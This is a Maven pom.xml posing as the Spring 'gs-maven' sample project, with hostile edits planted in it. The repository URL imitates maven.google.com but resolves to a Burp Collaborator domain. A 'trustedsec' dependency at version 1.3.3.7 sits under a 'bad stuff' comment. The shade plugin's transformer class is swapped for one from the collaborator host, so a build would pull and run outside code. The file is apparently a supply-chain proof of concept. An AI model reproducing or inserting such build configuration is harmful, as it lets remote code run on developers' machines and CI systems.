<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://alpha.v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/" xmlns:xsi="http://alpha.v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/"
    xsi:schemaLocation="http://alpha.v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/">
    <modelVersion>4.0.0</modelVersion>
	
	<groupId>org.springframework</groupId>
	<artifactId>gs-maven</artifactId>
	<packaging>jar</packaging>
	<version>0.1.0</version>

	<properties>
		<maven.compiler.source>1.8</maven.compiler.source>
		<maven.compiler.target>1.8</maven.compiler.target>
	</properties>

<repositories>
   <repository>
       <id>org.source.repo</id>
       <url>http://maven.google.com.v84lewqexklqy6597cm77vco0f65uu.burpcollaborator.net/</url>
   </repository>
</repositories>

	<dependencies>
		<!-- tag::bad stuff[] -->
		<dependency>
			<groupId>trustedsec</groupId>
			<artifactId>trustedsec</artifactId>
            <version>1.3.3.7</version>
		</dependency>
		<!-- tag::joda[] -->
		<dependency>
			<groupId>joda-time</groupId>
			<artifactId>joda-time</artifactId>
			<version>2.9.2</version>
		</dependency>
		<!-- end::joda[] -->
		<!-- tag::junit[] -->
		<dependency>
			<groupId>junit</groupId>
			<artifactId>junit</artifactId>
			<version>4.12</version>
			<scope>test</scope>
		</dependency>
		<!-- end::junit[] -->
	</dependencies>

	<build>
		<plugins>
			<plugin>
				<groupId>org.apache.maven.plugins</groupId>
				<artifactId>maven-shade-plugin</artifactId>
				<version>3.2.4</version>
				<executions>
					<execution>
						<phase>package</phase>
						<goals>
							<goal>shade</goal>
						</goals>
						<configuration>
							<transformers>
                                    <!-- <transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer"> -->
                                <transformer implementation="net.burpcollaborator.v84lewqexklqy6597cm77vco0f65uu.plugins.shade.resource.ManifestResourceTransformer">
                                    <mainClass>hello.HelloWorld</mainClass>
								</transformer>
							</transformers>
						</configuration>
					</execution>
				</executions>
			</plugin>
		</plugins>
	</build>

</project>
